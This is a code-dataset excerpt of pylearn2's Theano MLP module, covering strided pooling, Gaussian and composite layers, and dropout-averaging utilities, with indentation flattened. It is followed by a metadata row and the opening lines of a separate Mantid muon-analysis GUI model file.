def max_pool_c01b(c01b, pool_shape, pool_stride, image_shape):
"""
Theano's max pooling op only supports pool_stride = pool_shape
so here we have a graph that does max pooling with strides
Parameters
----------
c01b : theano tensor
minibatch in format (channels, rows, cols, batch size)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
avoid doing some of the arithmetic in theano
Returns
-------
pooled : theano tensor
The output of pooling applied to `c01b`
See Also
--------
sandbox.cuda_convnet.pool.max_pool_c01b : Same functionality but GPU-only
and considerably faster.
max_pool : Same functionality but with ('b', 0, 1, 'c') axes
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
assert pr > 0
assert pc > 0
assert pr <= r
assert pc <= c
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for c01bv in get_debug_values(c01b):
assert not contains_inf(c01bv)
assert c01bv.shape[1] == r
assert c01bv.shape[2] == c
wide_infinity = T.alloc(-np.inf,
c01b.shape[0],
required_r,
required_c,
c01b.shape[3])
name = c01b.name
if name is None:
name = 'anon_bc01'
c01b = T.set_subtensor(wide_infinity[:, 0:r, 0:c, :], c01b)
c01b.name = 'infinite_padded_' + name
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = c01b[:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs,
:]
cur.name = ('max_pool_cur_' + c01b.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
if mx is None:
mx = cur
else:
mx = T.maximum(mx, cur)
mx.name = ('max_pool_mx_' + c01b.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
mx.name = 'max_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
def mean_pool(bc01, pool_shape, pool_stride, image_shape):
"""
Does mean pooling (aka average pooling) via a Theano graph.
Parameters
----------
bc01 : theano tensor
minibatch in format (batch size, channels, rows, cols)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
(rows, cols) tuple to avoid doing some arithmetic in theano
Returns
-------
pooled : theano tensor
The output of pooling applied to `bc01`
See Also
--------
max_pool : Same thing but with max pooling
Examples
--------
>>> import theano
>>> import theano.tensor as T
>>> from pylearn2.models.mlp import mean_pool
>>> import numpy as np
>>> t = np.array([[1, 1, 3, 3],
... [1, 1, 3, 3],
... [5, 5, 7, 7],
... [5, 5, 7, 7],
... [9, 9, 11, 11],
... [9, 9, 11, 11]])
>>> X = np.zeros((3, t.shape[0], t.shape[1]))
>>> X[:] = t
>>> X = X[np.newaxis]
>>> X_sym = T.tensor4('X')
>>> pool_it = mean_pool(X_sym, pool_shape=(2, 2), pool_stride=(2, 2),
... image_shape=(6, 4))
>>> f = theano.function(inputs=[X_sym], outputs=pool_it)
    This will pool over windows of size (2, 2) while also stepping by this
    same amount, shrinking the example input to [[1, 3], [5, 7], [9, 11]].
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for bc01v in get_debug_values(bc01):
assert not contains_inf(bc01v)
assert bc01v.shape[2] == image_shape[0]
assert bc01v.shape[3] == image_shape[1]
wide_infinity = T.alloc(-np.inf,
bc01.shape[0],
bc01.shape[1],
required_r,
required_c)
name = bc01.name
if name is None:
name = 'anon_bc01'
bc01 = T.set_subtensor(wide_infinity[:, :, 0:r, 0:c], bc01)
bc01.name = 'infinite_padded_' + name
# Create a 'mask' used to keep count of the number of elements summed for
# each position
wide_infinity_count = T.alloc(0, bc01.shape[0], bc01.shape[1], required_r,
required_c)
bc01_count = T.set_subtensor(wide_infinity_count[:, :, 0:r, 0:c], 1)
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = bc01[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
cur.name = ('mean_pool_cur_' + bc01.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
cur_count = bc01_count[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
if mx is None:
mx = cur
count = cur_count
else:
mx = mx + cur
count = count + cur_count
mx.name = ('mean_pool_mx_' + bc01.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
mx /= count
mx.name = 'mean_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
@wraps(_WD)
def WeightDecay(*args, **kwargs):
warnings.warn("pylearn2.models.mlp.WeightDecay has moved to "
"pylearn2.costs.mlp.WeightDecay. This link"
"may be removed after 2015-05-13.")
return _WD(*args, **kwargs)
@wraps(_L1WD)
def L1WeightDecay(*args, **kwargs):
warnings.warn("pylearn2.models.mlp.L1WeightDecay has moved to "
"pylearn2.costs.mlp.WeightDecay. This link"
"may be removed after 2015-05-13.")
return _L1WD(*args, **kwargs)
class LinearGaussian(Linear):
"""
A Linear layer augmented with a precision vector, for modeling
conditionally Gaussian data.
    Specifically, given an input x, this layer models the distribution over
the output as
y ~ p(y | x) = N(y | Wx + b, beta^-1)
i.e., y is conditionally Gaussian with mean Wx + b and variance
beta^-1.
beta is a diagonal precision matrix so beta^-1 is a diagonal covariance
matrix.
Internally, beta is stored as the vector of diagonal values on this
matrix.
Since the output covariance is not a function of the input, this does
not provide an example-specific estimate of the error in the mean.
However, the vector-valued beta does mean that maximizing log p(y | x)
will reweight the mean squared error so that variables that can be
estimated easier will receive a higher penalty. This is one way of
    adapting the model better to heterogeneous data.
Parameters
----------
init_beta : float or ndarray
Any value > 0 that can be broadcasted to a vector of shape (dim, ).
The elements of beta are initialized to this value.
A good value is often the precision (inverse variance) of the target
variables in the training set, as provided by the
`beta_from_targets` function. This is the optimal beta for a dummy
model that just predicts the mean target value from the training set.
min_beta : float
The elements of beta are constrained to be >= this value.
This value must be > 0., otherwise the output conditional is not
constrained to be a valid probability distribution.
A good value is often the precision (inverse variance) of the target
variables in the training set, as provided by the
`beta_from_targets` function. This is the optimal beta for a dummy
model that just predicts the mean target value from the training set.
A trained model should always be able to obtain at least this much
precision, at least on the training set.
max_beta : float
The elements of beta are constrained to be <= this value.
We impose this constraint because for problems
where the training set values can be predicted
exactly, beta can grow without bound, which also makes the
gradients grow without bound, resulting in numerical problems.
kwargs : dict
Arguments to the `Linear` superclass.
"""
def __init__(self, init_beta, min_beta, max_beta, beta_lr_scale, **kwargs):
super(LinearGaussian, self).__init__(**kwargs)
self.__dict__.update(locals())
del self.self
del self.kwargs
@wraps(Layer.set_input_space)
def set_input_space(self, space):
super(LinearGaussian, self).set_input_space(space)
assert isinstance(self.output_space, VectorSpace)
self.beta = sharedX(self.output_space.get_origin() + self.init_beta,
'beta')
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = super(LinearGaussian,
self).get_layer_monitoring_channels(state_below,
state,
targets)
assert isinstance(rval, OrderedDict)
rval['beta_min'] = self.beta.min()
rval['beta_mean'] = self.beta.mean()
rval['beta_max'] = self.beta.max()
        if targets is not None:
rval['mse'] = T.sqr(state - targets).mean()
return rval
@wraps(Linear.cost)
def cost(self, Y, Y_hat):
return (0.5 * T.dot(T.sqr(Y - Y_hat), self.beta).mean() -
0.5 * T.log(self.beta).sum())
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
super(LinearGaussian, self)._modify_updates(updates)
if self.beta in updates:
updates[self.beta] = T.clip(updates[self.beta],
self.min_beta,
self.max_beta)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
rval = super(LinearGaussian, self).get_lr_scalers()
if self.beta_lr_scale is not None:
rval[self.beta] = self.beta_lr_scale
return rval
@wraps(Layer.get_params)
def get_params(self):
return super(LinearGaussian, self).get_params() + [self.beta]
def beta_from_design(design, min_var=1e-6, max_var=1e6):
"""
Returns the marginal precision of a design matrix.
Parameters
----------
design : ndarray
A numpy ndarray containing a design matrix
min_var : float
max_var : float
All variances are constrained to lie in the range [min_var, max_var]
to avoid numerical issues like infinite precision.
Returns
-------
beta : ndarray
A 1D vector containing the marginal precision of each variable in the
design matrix.
"""
return 1. / np.clip(design.var(axis=0), min_var, max_var)
def beta_from_targets(dataset, **kwargs):
"""
Returns the marginal precision of the targets in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
A DenseDesignMatrix with a targets field `y`
kwargs : dict
Extra arguments to `beta_from_design`
Returns
-------
beta : ndarray
A 1-D vector containing the marginal precision of the *targets* in
`dataset`.
"""
return beta_from_design(dataset.y, **kwargs)
def beta_from_features(dataset, **kwargs):
"""
Returns the marginal precision of the features in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
The dataset to compute the precision on.
kwargs : dict
Passed through to `beta_from_design`
Returns
-------
beta : ndarray
Vector of precision values for each feature in `dataset`
"""
return beta_from_design(dataset.X, **kwargs)
def mean_of_targets(dataset):
"""
Returns the mean of the targets in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
Returns
-------
mn : ndarray
A 1-D vector with entry i giving the mean of target i
"""
return dataset.y.mean(axis=0)
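# Illustrative sketch (assumption, not original code): the helpers above are
# typically used to set up a LinearGaussian output layer from training-set
# statistics; `train_set` is a hypothetical DenseDesignMatrix.
#
#   beta = beta_from_targets(train_set)
#   output_layer = LinearGaussian(init_beta=beta,
#                                 min_beta=beta.min(),
#                                 max_beta=1e6,
#                                 beta_lr_scale=None,
#                                 dim=train_set.y.shape[1],
#                                 layer_name='y',
#                                 irange=0.005)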
class PretrainedLayer(Layer):
"""
A layer whose weights are initialized, and optionally fixed,
based on prior training.
Parameters
----------
layer_content : Model
Should implement "upward_pass" (RBM and Autoencoder do this)
freeze_params: bool
        If True, regard layer_content's parameters as fixed
If False, they become parameters of this layer and can be
fine-tuned to optimize the MLP's cost function.
"""
def __init__(self, layer_name, layer_content, freeze_params=False):
super(PretrainedLayer, self).__init__()
self.__dict__.update(locals())
del self.self
@wraps(Layer.set_input_space)
def set_input_space(self, space):
assert self.get_input_space() == space
@wraps(Layer.get_params)
def get_params(self):
if self.freeze_params:
return []
return self.layer_content.get_params()
@wraps(Layer.get_input_space)
def get_input_space(self):
return self.layer_content.get_input_space()
@wraps(Layer.get_output_space)
def get_output_space(self):
return self.layer_content.get_output_space()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
return OrderedDict([])
@wraps(Layer.fprop)
def fprop(self, state_below):
return self.layer_content.upward_pass(state_below)
class CompositeLayer(Layer):
"""
A Layer that runs several layers in parallel. Its default behavior
is to pass the layer's input to each of the components.
Alternatively, it can take a CompositeSpace as an input and a mapping
from inputs to layers i.e. providing each component layer with a
subset of the inputs.
Parameters
----------
layer_name : str
The name of this layer
layers : tuple or list
The component layers to run in parallel.
inputs_to_layers : dict mapping int to list of ints, optional
Can only be used if the input space is a CompositeSpace.
If inputs_to_layers[i] contains j, it means input i will
be given as input to component j. Note that if multiple inputs are
passed on to e.g. an inner CompositeLayer, the same order will
be maintained. If the list is empty, the input will be discarded.
If an input does not appear in the dictionary, it will be given to
all components.
Examples
--------
>>> composite_layer = CompositeLayer(
... layer_name='composite_layer',
... layers=[Tanh(7, 'h0', 0.1), Sigmoid(5, 'h1', 0.1)],
... inputs_to_layers={
... 0: [1],
... 1: [0]
... })
This CompositeLayer has a CompositeSpace with 2 subspaces as its
input space. The first input is given to the Sigmoid layer, the second
input is given to the Tanh layer.
>>> wrapper_layer = CompositeLayer(
... layer_name='wrapper_layer',
... layers=[Linear(9, 'h2', 0.1),
... composite_layer,
... Tanh(7, 'h3', 0.1)],
... inputs_to_layers={
... 0: [1],
... 2: []
... })
This CompositeLayer takes 3 inputs. The first one is given to the
inner CompositeLayer. The second input is passed on to each component
layer i.e. to the Tanh, Linear as well as CompositeLayer. The third
    input is discarded. Note that the inner CompositeLayer will receive
the inputs with the same ordering i.e. [0, 1], and never [1, 0].
"""
def __init__(self, layer_name, layers, inputs_to_layers=None):
self.num_layers = len(layers)
if inputs_to_layers is not None:
if not isinstance(inputs_to_layers, dict):
raise TypeError("CompositeLayer expected inputs_to_layers to "
"be dict, got " + str(type(inputs_to_layers)))
self.inputs_to_layers = OrderedDict()
for key in sorted(inputs_to_layers):
assert isinstance(key, py_integer_types)
value = inputs_to_layers[key]
assert is_iterable(value)
assert all(isinstance(v, py_integer_types) for v in value)
# Check 'not value' to support case of empty list
assert not value or all(0 <= v < self.num_layers
for v in value)
self.inputs_to_layers[key] = sorted(value)
super(CompositeLayer, self).__init__()
self.__dict__.update(locals())
del self.self
@property
def routing_needed(self):
return self.inputs_to_layers is not None
@wraps(Layer.set_input_space)
def set_input_space(self, space):
if not isinstance(space, CompositeSpace):
if self.inputs_to_layers is not None:
raise ValueError("CompositeLayer received an inputs_to_layers "
"mapping, but does not have a CompositeSpace "
"as its input space, so there is nothing to "
"map. Received " + str(space) + " as input "
"space.")
elif self.routing_needed:
if not max(self.inputs_to_layers) < len(space.components):
raise ValueError("The inputs_to_layers mapping of "
"CompositeSpace contains they key " +
str(max(self.inputs_to_layers)) + " "
"(0-based) but the input space only "
"contains " + str(self.num_layers) + " "
"layers.")
# Invert the dictionary
self.layers_to_inputs = OrderedDict()
for i in xrange(self.num_layers):
inputs = []
for j in xrange(len(space.components)):
if j in self.inputs_to_layers:
if i in self.inputs_to_layers[j]:
inputs.append(j)
else:
inputs.append(j)
self.layers_to_inputs[i] = inputs
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_space = space.restrict(self.layers_to_inputs[i])
else:
cur_space = space
layer.set_input_space(cur_space)
self.input_space = space
self.output_space = CompositeSpace(tuple(layer.get_output_space()
for layer in self.layers))
self._target_space = CompositeSpace(tuple(layer.get_target_space()
for layer in self.layers))
@wraps(Layer.get_params)
def get_params(self):
rval = []
for layer in self.layers:
rval = safe_union(layer.get_params(), rval)
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
rvals = []
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_state_below = [state_below[j]
for j in self.layers_to_inputs[i]]
# This is to mimic the behavior of CompositeSpace's restrict
# method, which only returns a CompositeSpace when the number
# of components is greater than 1
if len(cur_state_below) == 1:
cur_state_below, = cur_state_below
else:
cur_state_below = state_below
rvals.append(layer.fprop(cur_state_below))
return tuple(rvals)
def _weight_decay_aggregate(self, method_name, coeff):
if isinstance(coeff, py_float_types):
return T.sum([getattr(layer, method_name)(coeff)
for layer in self.layers])
elif is_iterable(coeff):
assert all(layer_coeff >= 0 for layer_coeff in coeff)
return T.sum([getattr(layer, method_name)(layer_coeff) for
layer, layer_coeff in safe_zip(self.layers, coeff)
if layer_coeff > 0], dtype=config.floatX)
else:
raise TypeError("CompositeLayer's " + method_name + " received "
"coefficients of type " + str(type(coeff)) + " "
"but must be provided with a float or list/tuple")
def get_weight_decay(self, coeff):
"""
Provides an expression for a squared L2 penalty on the weights,
which is the weighted sum of the squared L2 penalties of the layer
components.
Parameters
----------
coeff : float or tuple/list
The coefficient on the squared L2 weight decay penalty for
this layer. If a single value is provided, this coefficient is
used for each component layer. If a list of tuple of
coefficients is given they are passed on to the component
layers in the given order.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the squared L2 weight decay penalty term for
this layer.
"""
return self._weight_decay_aggregate('get_weight_decay', coeff)
def get_l1_weight_decay(self, coeff):
"""
Provides an expression for a squared L1 penalty on the weights,
which is the weighted sum of the squared L1 penalties of the layer
components.
Parameters
----------
coeff : float or tuple/list
The coefficient on the L1 weight decay penalty for this layer.
If a single value is provided, this coefficient is used for
each component layer. If a list of tuple of coefficients is
given they are passed on to the component layers in the
given order.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the L1 weight decay penalty term for this
layer.
"""
return self._weight_decay_aggregate('get_l1_weight_decay', coeff)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return sum(layer.cost(Y_elem, Y_hat_elem)
for layer, Y_elem, Y_hat_elem in
safe_zip(self.layers, Y, Y_hat))
@wraps(Layer.set_mlp)
def set_mlp(self, mlp):
super(CompositeLayer, self).set_mlp(mlp)
for layer in self.layers:
layer.set_mlp(mlp)
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
# TODO: reduce redundancy with fprop method
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_state_below = [state_below[j]
for j in self.layers_to_inputs[i]]
# This is to mimic the behavior of CompositeSpace's restrict
# method, which only returns a CompositeSpace when the number
# of components is greater than 1
if len(cur_state_below) == 1:
cur_state_below, = cur_state_below
else:
cur_state_below = state_below
if state is not None:
cur_state = state[i]
else:
cur_state = None
if targets is not None:
cur_targets = targets[i]
else:
cur_targets = None
d = layer.get_layer_monitoring_channels(
cur_state_below, cur_state, cur_targets)
for key in d:
rval[layer.layer_name + '_' + key] = d[key]
return rval
@wraps(Model._modify_updates)
def _modify_updates(self, updates):
for layer in self.layers:
layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return get_lr_scalers_from_layers(self)
class FlattenerLayer(Layer):
"""
A wrapper around a different layer that flattens
the original layer's output.
The cost works by unflattening the target and then
calling the wrapped Layer's cost.
This is mostly intended for use with CompositeLayer as the wrapped
Layer, and is mostly useful as a workaround for theano not having
a TupleVariable with which to represent a composite target.
There are obvious memory, performance, and readability issues with doing
this, so really it would be better for theano to support TupleTypes.
See pylearn2.sandbox.tuple_var and the theano-dev e-mail thread
"TupleType".
Parameters
----------
raw_layer : Layer
Layer that FlattenerLayer wraps.
"""
def __init__(self, raw_layer):
super(FlattenerLayer, self).__init__()
self.__dict__.update(locals())
del self.self
self.layer_name = raw_layer.layer_name
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.raw_layer.set_input_space(space)
total_dim = self.raw_layer.get_output_space().get_total_dimension()
self.output_space = VectorSpace(total_dim)
@wraps(Layer.get_input_space)
def get_input_space(self):
return self.raw_layer.get_input_space()
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self, data):
return self.raw_layer.get_monitoring_channels(data)
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
raw_space = self.raw_layer.get_output_space()
state = raw_space.undo_format_as(state,
self.get_output_space())
if targets is not None:
targets = self.get_target_space().format_as(
targets, self.raw_layer.get_target_space())
return self.raw_layer.get_layer_monitoring_channels(
state_below=state_below,
state=state,
targets=targets
)
@wraps(Layer.get_monitoring_data_specs)
def get_monitoring_data_specs(self):
return self.raw_layer.get_monitoring_data_specs()
@wraps(Layer.get_params)
def get_params(self):
return self.raw_layer.get_params()
@wraps(Layer.get_weights)
def get_weights(self):
return self.raw_layer.get_weights()
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeffs):
return self.raw_layer.get_weight_decay(coeffs)
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeffs):
return self.raw_layer.get_l1_weight_decay(coeffs)
@wraps(Layer.set_batch_size)
def set_batch_size(self, batch_size):
self.raw_layer.set_batch_size(batch_size)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
self.raw_layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return self.raw_layer.get_lr_scalers()
@wraps(Layer.fprop)
def fprop(self, state_below):
raw = self.raw_layer.fprop(state_below)
return self.raw_layer.get_output_space().format_as(raw,
self.output_space)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
raw_space = self.raw_layer.get_output_space()
target_space = self.output_space
raw_Y = target_space.format_as(Y, raw_space)
raw_Y_hat = raw_space.undo_format_as(Y_hat, target_space)
raw_space.validate(raw_Y_hat)
return self.raw_layer.cost(raw_Y, raw_Y_hat)
@wraps(Layer.set_mlp)
def set_mlp(self, mlp):
super(FlattenerLayer, self).set_mlp(mlp)
self.raw_layer.set_mlp(mlp)
class WindowLayer(Layer):
"""
Layer used to select a window of an image input.
The input of the layer must be Conv2DSpace.
Parameters
----------
layer_name : str
A name for this layer.
window : tuple
A four-tuple of ints indicating respectively
the top left x and y position, and
the bottom right x and y position of the window.
"""
def __init__(self, layer_name, window):
super(WindowLayer, self).__init__()
self.__dict__.update(locals())
del self.self
if window[0] < 0 or window[0] > window[2] or \
window[1] < 0 or window[1] > window[3]:
raise ValueError("WindowLayer: bad window parameter")
@wraps(Layer.fprop)
def fprop(self, state_below):
extracts = [slice(None), slice(None), slice(None), slice(None)]
extracts[self.rows] = slice(self.window[0], self.window[2] + 1)
extracts[self.cols] = slice(self.window[1], self.window[3] + 1)
extracts = tuple(extracts)
return state_below[extracts]
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if not isinstance(space, Conv2DSpace):
raise TypeError("The input to a Window layer should be a "
"Conv2DSpace, but layer " + self.layer_name +
" got " + str(type(self.input_space)))
axes = space.axes
self.rows = axes.index(0)
self.cols = axes.index(1)
nrows = space.shape[0]
ncols = space.shape[1]
if self.window[2] + 1 > nrows or self.window[3] + 1 > ncols:
raise ValueError("WindowLayer: bad window shape. "
"Input is [" + str(nrows) + ", " +
str(ncols) + "], "
"but layer " + self.layer_name + " has window "
+ str(self.window))
self.output_space = Conv2DSpace(
shape=[self.window[2] - self.window[0] + 1,
self.window[3] - self.window[1] + 1],
num_channels=space.num_channels,
axes=axes)
@wraps(Layer.get_params)
def get_params(self):
return []
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self):
return []
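# Illustrative sketch (assumption, not original code): crop a 24x24 window out
# of a 32x32 Conv2DSpace input, keeping all channels. The window tuple is
# (top-left x, top-left y, bottom-right x, bottom-right y), inclusive.
#
#   crop = WindowLayer(layer_name='crop', window=(4, 4, 27, 27))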
def generate_dropout_mask(mlp, default_include_prob=0.5,
input_include_probs=None, rng=(2013, 5, 17)):
"""
Generate a dropout mask (as an integer) given inclusion
probabilities.
Parameters
----------
mlp : object
An MLP object.
default_include_prob : float, optional
The probability of including an input to a hidden
layer, for layers not listed in `input_include_probs`.
Default is 0.5.
input_include_probs : dict, optional
A dictionary mapping layer names to probabilities
of input inclusion for that layer. Default is `None`,
in which `default_include_prob` is used for all
layers.
rng : RandomState object or seed, optional
A `numpy.random.RandomState` object or a seed used to
create one.
Returns
-------
mask : int
An integer indexing a dropout mask for the network,
drawn with the appropriate probability given the
inclusion probabilities.
"""
if input_include_probs is None:
input_include_probs = {}
if not hasattr(rng, 'uniform'):
rng = np.random.RandomState(rng)
total_units = 0
mask = 0
for layer in mlp.layers:
if layer.layer_name in input_include_probs:
p = input_include_probs[layer.layer_name]
else:
p = default_include_prob
for _ in xrange(layer.get_input_space().get_total_dimension()):
mask |= int(rng.uniform() < p) << total_units
total_units += 1
return mask
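# Illustrative sketch (assumption, not original code): a sampled mask is an
# integer whose bits mark which inputs are kept, and can be fed directly to
# MLP.masked_fprop; `mlp` and `inputs` are hypothetical.
#
#   mask = generate_dropout_mask(mlp, default_include_prob=0.5)
#   output = mlp.masked_fprop(inputs, mask, None, 2., None)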
def sampled_dropout_average(mlp, inputs, num_masks,
default_input_include_prob=0.5,
input_include_probs=None,
default_input_scale=2.,
input_scales=None,
rng=(2013, 5, 17),
per_example=False):
"""
Take the geometric mean over a number of randomly sampled
dropout masks for an MLP with softmax outputs.
Parameters
----------
mlp : object
An MLP object.
inputs : tensor_like
A Theano variable representing a minibatch appropriate
for fpropping through the MLP.
num_masks : int
The number of masks to sample.
default_input_include_prob : float, optional
The probability of including an input to a hidden
layer, for layers not listed in `input_include_probs`.
Default is 0.5.
input_include_probs : dict, optional
A dictionary mapping layer names to probabilities
of input inclusion for that layer. Default is `None`,
        in which case `default_input_include_prob` is used for all
layers.
default_input_scale : float, optional
The amount to scale input in dropped out layers.
input_scales : dict, optional
A dictionary mapping layer names to constants by
which to scale the input.
rng : RandomState object or seed, optional
A `numpy.random.RandomState` object or a seed used to
create one.
per_example : bool, optional
If `True`, generate a different mask for every single
test example, so you have `num_masks` per example
instead of `num_mask` networks total. If `False`,
`num_masks` masks are fixed in the graph.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction of
all the networks.
"""
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
if not hasattr(rng, 'uniform'):
rng = np.random.RandomState(rng)
mlp._validate_layer_names(list(input_include_probs.keys()))
mlp._validate_layer_names(list(input_scales.keys()))
if per_example:
outputs = [mlp.dropout_fprop(inputs, default_input_include_prob,
input_include_probs,
default_input_scale,
input_scales)
for _ in xrange(num_masks)]
else:
masks = [generate_dropout_mask(mlp, default_input_include_prob,
input_include_probs, rng)
for _ in xrange(num_masks)]
outputs = [mlp.masked_fprop(inputs, mask, None,
default_input_scale, input_scales)
for mask in masks]
return geometric_mean_prediction(outputs)
def exhaustive_dropout_average(mlp, inputs, masked_input_layers=None,
default_input_scale=2., input_scales=None):
"""
Take the geometric mean over all dropout masks of an
MLP with softmax outputs.
Parameters
----------
mlp : object
An MLP object.
inputs : tensor_like
A Theano variable representing a minibatch appropriate
for fpropping through the MLP.
masked_input_layers : list, optional
A list of layer names whose input should be masked.
Default is all layers (including the first hidden
layer, i.e. mask the input).
default_input_scale : float, optional
The amount to scale input in dropped out layers.
input_scales : dict, optional
A dictionary mapping layer names to constants by
which to scale the input.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction
of all exponentially many masked subnetworks.
Notes
-----
This is obviously exponential in the size of the network,
don't do this except for tiny toy networks.
"""
if masked_input_layers is None:
masked_input_layers = mlp.layer_names
mlp._validate_layer_names(masked_input_layers)
if input_scales is None:
input_scales = {}
mlp._validate_layer_names(input_scales.keys())
if any(key not in masked_input_layers for key in input_scales):
not_in = [key for key in input_scales
if key not in mlp.layer_names]
raise ValueError(", ".join(not_in) + " in input_scales"
" but not masked")
num_inputs = mlp.get_total_input_dimension(masked_input_layers)
outputs = [mlp.masked_fprop(inputs, mask, masked_input_layers,
default_input_scale, input_scales)
for mask in xrange(2 ** num_inputs)]
return geometric_mean_prediction(outputs)
def geometric_mean_prediction(forward_props):
"""
Take the geometric mean over all dropout masks of an
MLP with softmax outputs.
Parameters
----------
forward_props : list
A list of Theano graphs corresponding to forward
propagations through the network with different
dropout masks.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction
of all exponentially many masked subnetworks.
Notes
-----
This is obviously exponential in the size of the network,
don't do this except for tiny toy networks.
"""
presoftmax = []
for out in forward_props:
assert isinstance(out.owner.op, T.nnet.Softmax)
assert len(out.owner.inputs) == 1
presoftmax.append(out.owner.inputs[0])
average = reduce(operator.add, presoftmax) / float(len(presoftmax))
return T.nnet.softmax(average)
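# Illustrative sketch (assumption, not original code): Monte-Carlo model
# averaging over 10 sampled dropout masks for a softmax MLP; `mlp` and
# `inputs` are hypothetical.
#
#   y_hat = sampled_dropout_average(mlp, inputs, num_masks=10,
#                                   default_input_include_prob=0.5,
#                                   default_input_scale=2.)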
class BadInputSpaceError(TypeError):
"""
An error raised by an MLP layer when set_input_space is given an
object that is not one of the Spaces that layer supports.
"""
def get_lr_scalers_from_layers(owner):
"""
Get the learning rate scalers for all member layers of
`owner`.
Parameters
----------
owner : Model
Any Model with a `layers` field
Returns
-------
lr_scalers : OrderedDict
A dictionary mapping parameters of `owner` to learning
rate scalers.
"""
rval = OrderedDict()
params = owner.get_params()
for layer in owner.layers:
contrib = layer.get_lr_scalers()
assert isinstance(contrib, OrderedDict)
# No two layers can contend to scale a parameter
assert not any([key in rval for key in contrib])
# Don't try to scale anything that's not a parameter
assert all([key in params for key in contrib])
rval.update(contrib)
assert all([isinstance(val, float) for val in rval.values()])
return rval
| bsd-3-clause | -8,657,553,449,295,059,000 | 33.730232 | 79 | 0.554054 | false |
mganeva/mantid | scripts/Muon/GUI/MuonAnalysis/load_widget/load_widget_model.py | 1 | 1513 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
from __future__ import (absolute_import, division, print_function)
from Muon.GUI.Common.muon_load_data import MuonLoadData
class LoadWidgetModel(object):
"""
The model is responsible for storing the currently loaded run or runs
    (both the run numbers, filenames and workspaces) as well as loading new runs using a separate loading thread.
"""
def __init__(self, loaded_data_store=MuonLoadData(), muon_context=None):
self._loaded_data_store = loaded_data_store
